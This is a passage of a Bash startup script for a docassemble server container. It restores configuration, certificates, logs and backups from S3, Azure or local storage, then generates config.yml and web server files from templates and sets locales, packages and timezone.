if [ "${S3ENABLE:-null}" == "true" ] && [ "${S3BUCKET:-null}" != "null" ] && [ "${S3ACCESSKEY:-null}" != "null" ] && [ "${S3SECRETACCESSKEY:-null}" != "null" ]; then
export S3_ACCESS_KEY="$S3ACCESSKEY"
export S3_SECRET_KEY="$S3SECRETACCESSKEY"
export AWS_ACCESS_KEY_ID="$S3ACCESSKEY"
export AWS_SECRET_ACCESS_KEY="$S3SECRETACCESSKEY"
fi
if [ "${S3ENDPOINTURL:-null}" != "null" ]; then
export S4CMD_OPTS="--endpoint-url=\"${S3ENDPOINTURL}\""
fi
if [ "${S3ENABLE:-null}" == "true" ]; then
if [ "${USEMINIO:-false}" == "true" ]; then
python -m docassemble.webapp.createminio "${S3ENDPOINTURL}" "${S3ACCESSKEY}" "${S3SECRETACCESSKEY}" "${S3BUCKET}"
else
s4cmd mb "s3://${S3BUCKET}" &> /dev/null
fi
fi
echo "9" >&2
if [ "${AZUREENABLE:-null}" == "null" ] && [ "${AZUREACCOUNTNAME:-null}" != "null" ] && [ "${AZUREACCOUNTKEY:-null}" != "null" ] && [ "${AZURECONTAINER:-null}" != "null" ]; then
echo "Enable azure" >&2
export AZUREENABLE=true
fi
echo "10" >&2
if [ "${S3ENABLE:-false}" == "true" ] && [[ $CONTAINERROLE =~ .*:(web):.* ]] && [[ $(s4cmd ls s3://${S3BUCKET}/hostname-rabbitmq) ]] && [[ $(s4cmd ls s3://${S3BUCKET}/ip-rabbitmq) ]]; then
TEMPKEYFILE=`mktemp`
s4cmd -f get s3://${S3BUCKET}/hostname-rabbitmq $TEMPKEYFILE
HOSTNAMERABBITMQ=$(<$TEMPKEYFILE)
s4cmd -f get s3://${S3BUCKET}/ip-rabbitmq $TEMPKEYFILE
IPRABBITMQ=$(<$TEMPKEYFILE)
rm -f $TEMPKEYFILE
if [ -n "$(grep $HOSTNAMERABBITMQ /etc/hosts)" ]; then
sed -i "/$HOSTNAMERABBITMQ/d" /etc/hosts
fi
echo "$IPRABBITMQ $HOSTNAMERABBITMQ" >> /etc/hosts
fi
echo "11" >&2
if [ "${AZUREENABLE:-false}" == "true" ]; then
echo "Initializing azure" >&2
cmd_retry blob-cmd -f -v add-account "${AZUREACCOUNTNAME}" "${AZUREACCOUNTKEY}"
fi
echo "12" >&2
if [ "${AZUREENABLE:-false}" == "true" ] && [[ $CONTAINERROLE =~ .*:(web):.* ]] && [[ $(python -m docassemble.webapp.list-cloud hostname-rabbitmq) ]] && [[ $(python -m docassemble.webapp.list-cloud ip-rabbitmq) ]]; then
TEMPKEYFILE=`mktemp`
echo "Copying hostname-rabbitmq" >&2
cmd_retry blob-cmd -f cp "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/hostname-rabbitmq" "${TEMPKEYFILE}"
HOSTNAMERABBITMQ=$(<$TEMPKEYFILE)
echo "Copying ip-rabbitmq" >&2
cmd_retry blob-cmd -f cp "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/ip-rabbitmq" "${TEMPKEYFILE}"
IPRABBITMQ=$(<$TEMPKEYFILE)
rm -f "${TEMPKEYFILE}"
if [ -n "$(grep $HOSTNAMERABBITMQ /etc/hosts)" ]; then
sed -i "/$HOSTNAMERABBITMQ/d" /etc/hosts
fi
echo "$IPRABBITMQ $HOSTNAMERABBITMQ" >> /etc/hosts
fi
echo "13" >&2
if [ "${S3ENABLE:-false}" == "true" ]; then
if [ "${EC2:-false}" == "true" ]; then
export LOCAL_HOSTNAME=`curl -s http://169.254.169.254/latest/meta-data/local-hostname`
else
export LOCAL_HOSTNAME=`hostname --fqdn`
fi
if [[ $CONTAINERROLE =~ .*:(all|web):.* ]] && [[ $(s4cmd ls "s3://${S3BUCKET}/letsencrypt.tar.gz") ]]; then
rm -f /tmp/letsencrypt.tar.gz
s4cmd get "s3://${S3BUCKET}/letsencrypt.tar.gz" /tmp/letsencrypt.tar.gz
cd /
tar -xf /tmp/letsencrypt.tar.gz
rm -f /tmp/letsencrypt.tar.gz
else
rm -f /etc/letsencrypt/da_using_lets_encrypt
fi
if [ "${DABACKUPDAYS}" != "0" ] && [[ $(s4cmd ls "s3://${S3BUCKET}/backup/${LOCAL_HOSTNAME}") ]]; then
s4cmd dsync "s3://${S3BUCKET}/backup/${LOCAL_HOSTNAME}" "${DA_ROOT}/backup"
fi
if [[ $CONTAINERROLE =~ .*:(all|web|log):.* ]] && [[ $(s4cmd ls "s3://${S3BUCKET}/apache") ]]; then
s4cmd dsync "s3://${S3BUCKET}/apache" /etc/apache2/sites-available
fi
if [[ $CONTAINERROLE =~ .*:(all):.* ]]; then
if [[ $(s4cmd ls "s3://${S3BUCKET}/apachelogs") ]]; then
s4cmd dsync "s3://${S3BUCKET}/apachelogs" /var/log/apache2
chown root.adm /var/log/apache2/*
chmod 640 /var/log/apache2/*
fi
if [[ $(s4cmd ls "s3://${S3BUCKET}/nginxlogs") ]]; then
s4cmd dsync "s3://${S3BUCKET}/nginxlogs" /var/log/nginx
chown www-data.adm /var/log/nginx/*
chmod 640 /var/log/nginx/*
fi
fi
if [[ $CONTAINERROLE =~ .*:(all|log):.* ]] && [[ $(s4cmd ls "s3://${S3BUCKET}/log") ]]; then
s4cmd dsync "s3://${S3BUCKET}/log" "${LOGDIRECTORY:-${DA_ROOT}/log}"
chown -R www-data.www-data "${LOGDIRECTORY:-${DA_ROOT}/log}"
fi
if [[ $(s4cmd ls "s3://${S3BUCKET}/config.yml") ]]; then
rm -f "$DA_CONFIG_FILE"
s4cmd get "s3://${S3BUCKET}/config.yml" "$DA_CONFIG_FILE"
chown www-data.www-data "$DA_CONFIG_FILE"
fi
if [[ $CONTAINERROLE =~ .*:(all|redis):.* ]] && [[ $(s4cmd ls "s3://${S3BUCKET}/redis.rdb") ]] && [ "$REDISRUNNING" = false ]; then
s4cmd -f get "s3://${S3BUCKET}/redis.rdb" "/var/lib/redis/dump.rdb"
chown redis.redis "/var/lib/redis/dump.rdb"
fi
elif [ "${AZUREENABLE:-false}" == "true" ]; then
if [ "${EC2:-false}" == "true" ]; then
export LOCAL_HOSTNAME=`curl -s http://169.254.169.254/latest/meta-data/local-hostname`
else
export LOCAL_HOSTNAME=`hostname --fqdn`
fi
if [[ $CONTAINERROLE =~ .*:(all|web):.* ]] && [[ $(python -m docassemble.webapp.list-cloud letsencrypt.tar.gz) ]]; then
rm -f /tmp/letsencrypt.tar.gz
echo "Copying let's encrypt" >&2
cmd_retry blob-cmd -f cp "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/letsencrypt.tar.gz" "/tmp/letsencrypt.tar.gz"
cd /
tar -xf /tmp/letsencrypt.tar.gz
rm -f /tmp/letsencrypt.tar.gz
else
rm -f /etc/letsencrypt/da_using_lets_encrypt
fi
if [ "${DABACKUPDAYS}" != "0" ] && [[ $(python -m docassemble.webapp.list-cloud backup/${LOCAL_HOSTNAME}/) ]]; then
BACKUPDIR="backup/${LOCAL_HOSTNAME}/"
let BACKUPDIRLENGTH=${#BACKUPDIR}+1
for the_file in $(python -m docassemble.webapp.list-cloud $BACKUPDIR | cut -c ${BACKUPDIRLENGTH}-); do
echo "Found $the_file on Azure" >&2
if ! [[ $the_file =~ /$ ]]; then
if [ ! -f "${DA_ROOT}/backup/${the_file}" ]; then
echo "Copying backup file" $the_file >&2
cmd_retry blob-cmd -f cp "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/backup/${LOCAL_HOSTNAME}/${the_file}" "${DA_ROOT}/backup/${the_file}"
fi
fi
done
fi
if [[ $CONTAINERROLE =~ .*:(all|web|log):.* ]] && [[ $(python -m docassemble.webapp.list-cloud apache/) ]]; then
echo "There are apache files on Azure" >&2
for the_file in $(python -m docassemble.webapp.list-cloud apache/ | cut -c 8-); do
echo "Found $the_file on Azure" >&2
if ! [[ $the_file =~ /$ ]]; then
echo "Copying apache file" $the_file >&2
cmd_retry blob-cmd -f cp "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/apache/${the_file}" "/etc/apache2/sites-available/${the_file}"
fi
done
else
rm -f /etc/letsencrypt/da_using_lets_encrypt
fi
if [[ $CONTAINERROLE =~ .*:(all):.* ]]; then
if [[ $(python -m docassemble.webapp.list-cloud apachelogs/) ]]; then
echo "There are apache log files on Azure" >&2
for the_file in $(python -m docassemble.webapp.list-cloud apachelogs/ | cut -c 12-); do
echo "Found $the_file on Azure" >&2
if ! [[ $the_file =~ /$ ]]; then
echo "Copying log file $the_file" >&2
cmd_retry blob-cmd -f cp "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/apachelogs/${the_file}" "/var/log/apache2/${the_file}"
fi
done
chown root.adm /var/log/apache2/*
chmod 640 /var/log/apache2/*
fi
if [[ $(python -m docassemble.webapp.list-cloud nginxlogs/) ]]; then
echo "There are nginx log files on Azure" >&2
for the_file in $(python -m docassemble.webapp.list-cloud nginxlogs/ | cut -c 11-); do
echo "Found $the_file on Azure" >&2
if ! [[ $the_file =~ /$ ]]; then
echo "Copying log file $the_file" >&2
cmd_retry blob-cmd -f cp "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/nginxlogs/${the_file}" "/var/log/nginx/${the_file}"
fi
done
chown www-data.adm /var/log/nginx/*
chmod 640 /var/log/nginx/*
fi
fi
if [[ $CONTAINERROLE =~ .*:(all|log):.* ]] && [[ $(python -m docassemble.webapp.list-cloud log) ]]; then
echo "There are log files on Azure" >&2
for the_file in $(python -m docassemble.webapp.list-cloud log/ | cut -c 5-); do
echo "Found $the_file on Azure" >&2
if ! [[ $the_file =~ /$ ]]; then
echo "Copying log file $the_file" >&2
cmd_retry blob-cmd -f cp "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/log/${the_file}" "${LOGDIRECTORY:-${DA_ROOT}/log}/${the_file}"
fi
done
chown -R www-data.www-data "${LOGDIRECTORY:-${DA_ROOT}/log}"
fi
if [[ $(python -m docassemble.webapp.list-cloud config.yml) ]]; then
rm -f "$DA_CONFIG_FILE"
echo "Copying config.yml" >&2
cmd_retry blob-cmd -f cp "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/config.yml" "${DA_CONFIG_FILE}"
chown www-data.www-data "${DA_CONFIG_FILE}"
ls -l "${DA_CONFIG_FILE}" >&2
fi
if [[ $CONTAINERROLE =~ .*:(all|redis):.* ]] && [[ $(python -m docassemble.webapp.list-cloud redis.rdb) ]] && [ "$REDISRUNNING" = false ]; then
echo "Copying redis" >&2
cmd_retry blob-cmd -f cp "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/redis.rdb" "/var/lib/redis/dump.rdb"
chown redis.redis "/var/lib/redis/dump.rdb"
fi
else
if [[ $CONTAINERROLE =~ .*:(all|web):.* ]] && [ -f "${DA_ROOT}/backup/letsencrypt.tar.gz" ]; then
cd /
tar -xf "${DA_ROOT}/backup/letsencrypt.tar.gz"
fi
if [[ $CONTAINERROLE =~ .*:(all|web|log):.* ]] && [ -d "${DA_ROOT}/backup/apache" ]; then
rsync -auq "${DA_ROOT}/backup/apache/" /etc/apache2/sites-available/
fi
if [[ $CONTAINERROLE =~ .*:(all):.* ]] && [ -d "${DA_ROOT}/backup/apachelogs" ]; then
rsync -auq "${DA_ROOT}/backup/apachelogs/" /var/log/apache2/
chown root.adm /var/log/apache2/*
chmod 640 /var/log/apache2/*
fi
if [[ $CONTAINERROLE =~ .*:(all):.* ]] && [ -d "${DA_ROOT}/backup/nginxlogs" ]; then
rsync -auq "${DA_ROOT}/backup/nginxlogs/" /var/log/nginx/
chown www-data.adm /var/log/nginx/*
chmod 640 /var/log/nginx/*
fi
if [[ $CONTAINERROLE =~ .*:(all|log):.* ]] && [ -d "${DA_ROOT}/backup/log" ]; then
rsync -auq "${DA_ROOT}/backup/log/" "${LOGDIRECTORY:-${DA_ROOT}/log}/"
chown -R www-data.www-data "${LOGDIRECTORY:-${DA_ROOT}/log}"
fi
if [ -f "${DA_ROOT}/backup/config.yml" ]; then
cp "${DA_ROOT}/backup/config.yml" "${DA_CONFIG_FILE}"
chown www-data.www-data "${DA_CONFIG_FILE}"
fi
if [ -d "${DA_ROOT}/backup/files" ]; then
rsync -auq "${DA_ROOT}/backup/files" "${DA_ROOT}/"
chown -R www-data.www-data "${DA_ROOT}/files"
fi
if [[ $CONTAINERROLE =~ .*:(all|redis):.* ]] && [ -f "${DA_ROOT}/backup/redis.rdb" ] && [ "$REDISRUNNING" = false ]; then
cp "${DA_ROOT}/backup/redis.rdb" /var/lib/redis/dump.rdb
chown redis.redis "/var/lib/redis/dump.rdb"
fi
fi
echo "14" >&2
DEFAULT_SECRET=$(python -m docassemble.base.generate_key)
echo "15" >&2
if [ "${BEHINDHTTPSLOADBALANCER:-null}" == "true" ] && [ "${XSENDFILE:-null}" == "null" ]; then
export XSENDFILE=false
fi
if [ ! -f "$DA_CONFIG_FILE" ]; then
echo "There is no config file. Creating one from source." >&2
sed -e 's@{{DBPREFIX}}@'"${DBPREFIX:-postgresql+psycopg2:\/\/}"'@' \
-e 's/{{DBNAME}}/'"${DBNAME:-docassemble}"'/' \
-e 's/{{DBUSER}}/'"${DBUSER:-docassemble}"'/' \
-e 's#{{DBPASSWORD}}#'"${DBPASSWORD:-abc123}"'#' \
-e 's/{{DBHOST}}/'"${DBHOST:-null}"'/' \
-e 's/{{DBPORT}}/'"${DBPORT:-null}"'/' \
-e 's/{{DBTABLEPREFIX}}/'"${DBTABLEPREFIX:-null}"'/' \
-e 's/{{DBBACKUP}}/'"${DBBACKUP:-true}"'/' \
-e 's/{{S3ENABLE}}/'"${S3ENABLE:-false}"'/' \
-e 's#{{S3ACCESSKEY}}#'"${S3ACCESSKEY:-null}"'#' \
-e 's#{{S3SECRETACCESSKEY}}#'"${S3SECRETACCESSKEY:-null}"'#' \
-e 's@{{S3ENDPOINTURL}}@'"${S3ENDPOINTURL:-null}"'@' \
-e 's/{{S3BUCKET}}/'"${S3BUCKET:-null}"'/' \
-e 's/{{S3REGION}}/'"${S3REGION:-null}"'/' \
-e 's/{{AZUREENABLE}}/'"${AZUREENABLE:-false}"'/' \
-e 's/{{AZUREACCOUNTNAME}}/'"${AZUREACCOUNTNAME:-null}"'/' \
-e 's@{{AZUREACCOUNTKEY}}@'"${AZUREACCOUNTKEY:-null}"'@' \
-e 's/{{AZURECONTAINER}}/'"${AZURECONTAINER:-null}"'/' \
-e 's/{{DABACKUPDAYS}}/'"${DABACKUPDAYS:-14}"'/' \
-e 's@{{REDIS}}@'"${REDIS:-null}"'@' \
-e 's#{{RABBITMQ}}#'"${RABBITMQ:-null}"'#' \
-e 's@{{TIMEZONE}}@'"${TIMEZONE:-null}"'@' \
-e 's/{{EC2}}/'"${EC2:-false}"'/' \
-e 's/{{COLLECTSTATISTICS}}/'"${COLLECTSTATISTICS:-false}"'/' \
-e 's/{{KUBERNETES}}/'"${KUBERNETES:-false}"'/' \
-e 's/{{USECLOUDURLS}}/'"${USECLOUDURLS:-false}"'/' \
-e 's/{{USEMINIO}}/'"${USEMINIO:-false}"'/' \
-e 's/{{USEHTTPS}}/'"${USEHTTPS:-false}"'/' \
-e 's/{{USELETSENCRYPT}}/'"${USELETSENCRYPT:-false}"'/' \
-e 's/{{LETSENCRYPTEMAIL}}/'"${LETSENCRYPTEMAIL:-null}"'/' \
-e 's@{{LOGSERVER}}@'"${LOGSERVER:-null}"'@' \
-e 's/{{DAHOSTNAME}}/'"${DAHOSTNAME:-none}"'/' \
-e 's/{{LOCALE}}/'"${LOCALE:-null}"'/' \
-e 's/{{SERVERADMIN}}/'"${SERVERADMIN:-webmaster@localhost}"'/' \
-e 's@{{DASECRETKEY}}@'"${DEFAULT_SECRET}"'@' \
-e 's@{{URLROOT}}@'"${URLROOT:-null}"'@' \
-e 's@{{POSTURLROOT}}@'"${POSTURLROOT:-/}"'@' \
-e 's/{{BEHINDHTTPSLOADBALANCER}}/'"${BEHINDHTTPSLOADBALANCER:-false}"'/' \
-e 's/{{XSENDFILE}}/'"${XSENDFILE:-true}"'/' \
-e 's/{{DAEXPOSEWEBSOCKETS}}/'"${DAEXPOSEWEBSOCKETS:-false}"'/' \
-e 's/{{DAWEBSOCKETSIP}}/'"${DAWEBSOCKETSIP:-null}"'/' \
-e 's/{{DAWEBSOCKETSPORT}}/'"${DAWEBSOCKETSPORT:-null}"'/' \
-e 's/{{DAUPDATEONSTART}}/'"${DAUPDATEONSTART:-true}"'/' \
-e 's/{{DAALLOWUPDATES}}/'"${DAALLOWUPDATES:-true}"'/' \
-e 's/{{DAWEBSERVER}}/'"${DAWEBSERVER:-nginx}"'/' \
-e 's/{{DASTABLEVERSION}}/'"${DASTABLEVERSION:-false}"'/' \
-e 's/{{DASQLPING}}/'"${DASQLPING:-false}"'/' \
"$DA_CONFIG_FILE_DIST" > "$DA_CONFIG_FILE" || exit 1
fi
chown www-data.www-data "$DA_CONFIG_FILE"
echo "16" >&2
source /dev/stdin < <(su -c "source \"${DA_ACTIVATE}\" && python -m docassemble.base.read_config \"${DA_CONFIG_FILE}\"" www-data)
export LOGDIRECTORY="${LOGDIRECTORY:-${DA_ROOT}/log}"
echo "16.1" >&2
python -m docassemble.webapp.starthook "${DA_CONFIG_FILE}"
echo "16.5" >&2
if [ "${DAWEBSERVER:-nginx}" = "nginx" ]; then
sed -e 's@{{DA_PYTHON}}@'"${DA_PYTHON:-${DA_ROOT}/${DA_DEFAULT_LOCAL}}"'@' \
-e 's@{{DAWSGIROOT}}@'"${WSGIROOT}"'@' \
-e 's@{{DA_ROOT}}@'"${DA_ROOT}"'@' \
"${DA_ROOT}/config/docassemble.ini.dist" > "${DA_ROOT}/config/docassemble.ini"
sed -e 's@{{DA_PYTHON}}@'"${DA_PYTHON:-${DA_ROOT}/${DA_DEFAULT_LOCAL}}"'@' \
-e 's@{{DA_ROOT}}@'"${DA_ROOT}"'@' \
"${DA_ROOT}/config/docassemblelog.ini.dist" > "${DA_ROOT}/config/docassemblelog.ini"
mkdir -p /var/run/uwsgi
chown www-data.www-data /var/run/uwsgi
fi
echo "17" >&2
if [ "${S3ENABLE:-false}" == "true" ] && [[ ! $(s4cmd ls "s3://${S3BUCKET}/config.yml") ]]; then
s4cmd -f put "${DA_CONFIG_FILE}" "s3://${S3BUCKET}/config.yml"
fi
if [ "${S3ENABLE:-false}" == "true" ] && [[ ! $(s4cmd ls "s3://${S3BUCKET}/files") ]]; then
if [ -d "${DA_ROOT}/files" ]; then
for the_file in $(ls "${DA_ROOT}/files"); do
if [[ $the_file =~ ^[0-9]+ ]]; then
for sub_file in $(find "${DA_ROOT}/files/$the_file" -type f); do
file_number="${sub_file#${DA_ROOT}/files/}"
file_number="${file_number:0:15}"
file_directory="${DA_ROOT}/files/$file_number"
target_file="${sub_file#${file_directory}}"
file_number="${file_number//\//}"
file_number=$((16#$file_number))
s4cmd -f put "${sub_file}" "s3://${S3BUCKET}/files/${file_number}/${target_file}"
done
else
s4cmd dsync "${DA_ROOT}/files/${the_file}" "s3://${S3BUCKET}/${the_file}"
fi
done
fi
fi
echo "18" >&2
if [ "${AZUREENABLE:-false}" == "true" ]; then
echo "Initializing azure" >&2
cmd_retry blob-cmd -f -v add-account "${AZUREACCOUNTNAME}" "${AZUREACCOUNTKEY}"
fi
echo "19" >&2
if [ "${AZUREENABLE:-false}" == "true" ] && [[ ! $(python -m docassemble.webapp.list-cloud config.yml) ]]; then
echo "Saving config" >&2
cmd_retry blob-cmd -f cp "${DA_CONFIG_FILE}" "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/config.yml"
fi
echo "19.5" >&2
if [ "${AZUREENABLE:-false}" == "true" ] && [[ ! $(python -m docassemble.webapp.list-cloud files) ]]; then
if [ -d "${DA_ROOT}/files" ]; then
for the_file in $(ls "${DA_ROOT}/files"); do
if [[ $the_file =~ ^[0-9]+ ]]; then
for sub_file in $(find "${DA_ROOT}/files/$the_file" -type f); do
file_number="${sub_file#${DA_ROOT}/files/}"
file_number="${file_number:0:15}"
file_directory="${DA_ROOT}/files/$file_number/"
target_file="${sub_file#${file_directory}}"
file_number="${file_number//\//}"
file_number=$((16#$file_number))
cmd_retry blob-cmd -f cp "${sub_file}" "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/files/${file_number}/${target_file}"
done
else
for sub_file in $(find "${DA_ROOT}/files/$the_file" -type f); do
target_file="${sub_file#${DA_ROOT}/files/}"
cmd_retry blob-cmd -f cp "${sub_file}" "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/${target_file}"
done
fi
done
fi
fi
echo "20" >&2
if [ "${EC2:-false}" == "true" ]; then
export LOCAL_HOSTNAME=`curl -s http://169.254.169.254/latest/meta-data/local-hostname`
export PUBLIC_HOSTNAME=`curl -s http://169.254.169.254/latest/meta-data/public-hostname`
else
export LOCAL_HOSTNAME=`hostname --fqdn`
export PUBLIC_HOSTNAME="${LOCAL_HOSTNAME}"
fi
echo "21" >&2
if [ "${DAHOSTNAME:-none}" == "none" ]; then
export DAHOSTNAME="${PUBLIC_HOSTNAME}"
fi
echo "22" >&2
if [ "${DAWEBSERVER:-nginx}" = "apache" ]; then
if [[ $CONTAINERROLE =~ .*:(all|web|log):.* ]]; then
a2dissite -q 000-default &> /dev/null
a2dissite -q default-ssl &> /dev/null
rm -f /etc/apache2/sites-available/000-default.conf
rm -f /etc/apache2/sites-available/default-ssl.conf
if [ "${DAHOSTNAME:-none}" != "none" ]; then
if [ ! -f "/etc/letsencrypt/live/${DAHOSTNAME}/fullchain.pem" ]; then
rm -f /etc/letsencrypt/da_using_lets_encrypt
fi
if [ ! -f /etc/apache2/sites-available/docassemble-ssl.conf ]; then
cp "${DA_ROOT}/config/docassemble-ssl.conf.dist" /etc/apache2/sites-available/docassemble-ssl.conf
rm -f /etc/letsencrypt/da_using_lets_encrypt
fi
if [ ! -f /etc/apache2/sites-available/docassemble-http.conf ]; then
cp "${DA_ROOT}/config/docassemble-http.conf.dist" /etc/apache2/sites-available/docassemble-http.conf
rm -f /etc/letsencrypt/da_using_lets_encrypt
fi
if [ ! -f /etc/apache2/sites-available/docassemble-log.conf ]; then
cp "${DA_ROOT}/config/docassemble-log.conf.dist" /etc/apache2/sites-available/docassemble-log.conf
fi
if [ ! -f /etc/apache2/sites-available/docassemble-redirect.conf ]; then
cp "${DA_ROOT}/config/docassemble-redirect.conf.dist" /etc/apache2/sites-available/docassemble-redirect.conf
fi
else
if [ ! -f /etc/apache2/sites-available/docassemble-http.conf ]; then
cp "${DA_ROOT}/config/docassemble-http.conf.dist" /etc/apache2/sites-available/docassemble-http.conf || exit 1
fi
fi
a2ensite docassemble-http
fi
fi
if [ "${DAWEBSERVER:-nginx}" = "nginx" ]; then
if [ "${USELETSENCRYPT:-false}" == "true" ] && [ -f "/etc/letsencrypt/live/${DAHOSTNAME}/fullchain.pem" ]; then
DASSLCERTIFICATE="/etc/letsencrypt/live/${DAHOSTNAME}/fullchain.pem; # managed by Certbot"
DASSLCERTIFICATEKEY="/etc/letsencrypt/live/${DAHOSTNAME}/privkey.pem; # managed by Certbot"
else
DASSLCERTIFICATE="/etc/ssl/docassemble/nginx.crt;"
DASSLCERTIFICATEKEY="/etc/ssl/docassemble/nginx.key;"
fi
DASSLPROTOCOLS=${DASSLPROTOCOLS:-TLSv1.2}
if [ ! -f "/etc/letsencrypt/live/${DAHOSTNAME}/fullchain.pem" ]; then
rm -f /etc/letsencrypt/da_using_lets_encrypt
fi
if [ "${BEHINDHTTPSLOADBALANCER:-false}" == "true" ]; then
DAREALIP="include ${DA_ROOT}/config/nginx-realip;"
ln -sf /etc/nginx/sites-available/docassembleredirect /etc/nginx/sites-enabled/docassembleredirect
else
DAREALIP=""
rm -f /etc/nginx/sites-enabled/docassembleredirect
fi
if [ "${POSTURLROOT}" == "/" ]; then
DALOCATIONREWRITE=" "
else
DALOCATIONREWRITE="location = ${WSGIROOT} { rewrite ^ ${POSTURLROOT}; }"
fi
if [[ $CONTAINERROLE =~ .*:(all|web|log):.* ]]; then
rm -f /etc/nginx/sites-available/default
rm -f /etc/nginx/sites-enabled/default
if [ "${DAHOSTNAME:-none}" != "none" ]; then
if [ ! -f /etc/nginx/sites-available/docassemblessl ]; then
sed -e 's@{{DAHOSTNAME}}@'"${DAHOSTNAME:-localhost}"'@' \
-e 's@{{DALOCATIONREWRITE}}@'"${DALOCATIONREWRITE}"'@' \
-e 's@{{DAWSGIROOT}}@'"${WSGIROOT}"'@' \
-e 's@{{DAPOSTURLROOT}}@'"${POSTURLROOT}"'@' \
-e 's@{{DAREALIP}}@'"${DAREALIP}"'@' \
-e 's@{{DAMAXCONTENTLENGTH}}@'"${DAMAXCONTENTLENGTH}"'@' \
-e 's@{{DASSLCERTIFICATE}}@'"${DASSLCERTIFICATE}"'@' \
-e 's@{{DASSLCERTIFICATEKEY}}@'"${DASSLCERTIFICATEKEY}"'@' \
-e 's@{{DASSLPROTOCOLS}}@'"${DASSLPROTOCOLS}"'@' \
-e 's@{{DAWEBSOCKETSIP}}@'"${DAWEBSOCKETSIP:-127.0.0.1}"'@' \
-e 's@{{DAWEBSOCKETSPORT}}@'"${DAWEBSOCKETSPORT:-5000}"'@' \
"${DA_ROOT}/config/nginx-ssl.dist" > "/etc/nginx/sites-available/docassemblessl"
rm -f /etc/letsencrypt/da_using_lets_encrypt
fi
if [ ! -f /etc/nginx/sites-available/docassemblehttp ]; then
sed -e 's@{{DAHOSTNAME}}@'"${DAHOSTNAME:-localhost}"'@' \
-e 's@{{DALOCATIONREWRITE}}@'"${DALOCATIONREWRITE}"'@' \
-e 's@{{DAWSGIROOT}}@'"${WSGIROOT}"'@' \
-e 's@{{DAPOSTURLROOT}}@'"${POSTURLROOT}"'@' \
-e 's@{{DAREALIP}}@'"${DAREALIP}"'@' \
-e 's@{{DAMAXCONTENTLENGTH}}@'"${DAMAXCONTENTLENGTH}"'@' \
-e 's@{{DAWEBSOCKETSIP}}@'"${DAWEBSOCKETSIP:-127.0.0.1}"'@' \
-e 's@{{DAWEBSOCKETSPORT}}@'"${DAWEBSOCKETSPORT:-5000}"'@' \
"${DA_ROOT}/config/nginx-http.dist" > "/etc/nginx/sites-available/docassemblehttp"
rm -f /etc/letsencrypt/da_using_lets_encrypt
fi
if [ ! -f /etc/nginx/sites-available/docassemblelog ]; then
sed -e 's@{{DAHOSTNAME}}@'"${DAHOSTNAME:-localhost}"'@' \
-e 's@{{DAMAXCONTENTLENGTH}}@'"${DAMAXCONTENTLENGTH}"'@' \
"${DA_ROOT}/config/nginx-log.dist" > "/etc/nginx/sites-available/docassemblelog"
fi
if [ ! -f /etc/nginx/sites-available/docassembleredirect ]; then
sed -e 's@{{DAHOSTNAME}}@'"${DAHOSTNAME:-localhost}"'@' \
"${DA_ROOT}/config/nginx-redirect.dist" > "/etc/nginx/sites-available/docassembleredirect"
fi
if [ ! -f /etc/nginx/sites-available/docassemblesslredirect ]; then
sed -e 's@{{DAHOSTNAME}}@'"${DAHOSTNAME:-localhost}"'@' \
"${DA_ROOT}/config/nginx-ssl-redirect.dist" > "/etc/nginx/sites-available/docassemblesslredirect"
fi
else
if [ ! -f /etc/nginx/sites-available/docassemblehttp ]; then
sed -e 's@{{DAHOSTNAME}}@'"${DAHOSTNAME:-localhost}"'@' \
-e 's@{{DALOCATIONREWRITE}}@'"${DALOCATIONREWRITE}"'@' \
-e 's@{{DAWSGIROOT}}@'"${WSGIROOT}"'@' \
-e 's@{{DAPOSTURLROOT}}@'"${POSTURLROOT}"'@' \
-e 's@{{DAREALIP}}@'"${DAREALIP}"'@' \
-e 's@{{DAMAXCONTENTLENGTH}}@'"${DAMAXCONTENTLENGTH}"'@' \
-e 's@{{DAWEBSOCKETSIP}}@'"${DAWEBSOCKETSIP:-127.0.0.1}"'@' \
-e 's@{{DAWEBSOCKETSPORT}}@'"${DAWEBSOCKETSPORT:-5000}"'@' \
"${DA_ROOT}/config/nginx-http.dist" > "/etc/nginx/sites-available/docassemblehttp"
fi
fi
fi
fi
echo "23" >&2
if [ "${LOCALE:-undefined}" == "undefined" ]; then
LOCALE="en_US.UTF-8 UTF-8"
fi
echo "24" >&2
set -- $LOCALE
DA_LANGUAGE=$1
export LANG=$1
grep -q "^$LOCALE" /etc/locale.gen || { echo $LOCALE >> /etc/locale.gen && locale-gen ; }
update-locale LANG="${DA_LANGUAGE}"
echo "25" >&2
if [ -n "$OTHERLOCALES" ]; then
NEWLOCALE=false
for LOCALETOSET in "${OTHERLOCALES[@]}"; do
grep -q "^$LOCALETOSET" /etc/locale.gen || { echo $LOCALETOSET >> /etc/locale.gen; NEWLOCALE=true; }
done
if [ "$NEWLOCALE" = true ]; then
locale-gen
fi
fi
echo "26" >&2
if [ -n "$PACKAGES" ]; then
for PACKAGE in "${PACKAGES[@]}"; do
apt-get -q -y install $PACKAGE &> /dev/null
done
fi
echo "26.5" >&2
if [ -n "$PYTHONPACKAGES" ]; then
for PACKAGE in "${PYTHONPACKAGES[@]}"; do
su -c "source \"${DA_ACTIVATE}\" && pip install $PACKAGE" www-data
done
fi
echo "27" >&2
if [ "${TIMEZONE:-undefined}" != "undefined" ] && [ -f /usr/share/zoneinfo/$TIMEZONE ]; then
ln -fs /usr/share/zoneinfo/$TIMEZONE /etc/localtime
dpkg-reconfigure -f noninteractive tzdata
fi
echo "28" >&2
if [ "${S3ENABLE:-false}" == "true" ] || [ "${AZUREENABLE:-false}" == "true" ]; then
su -c "source \"${DA_ACTIVATE}\" && python -m docassemble.webapp.cloud_register \"${DA_CONFIG_FILE}\"" www-data
fi
echo "29" >&2
if pg_isready -q; then
PGRUNNING=true
else
PGRUNNING=false
fi
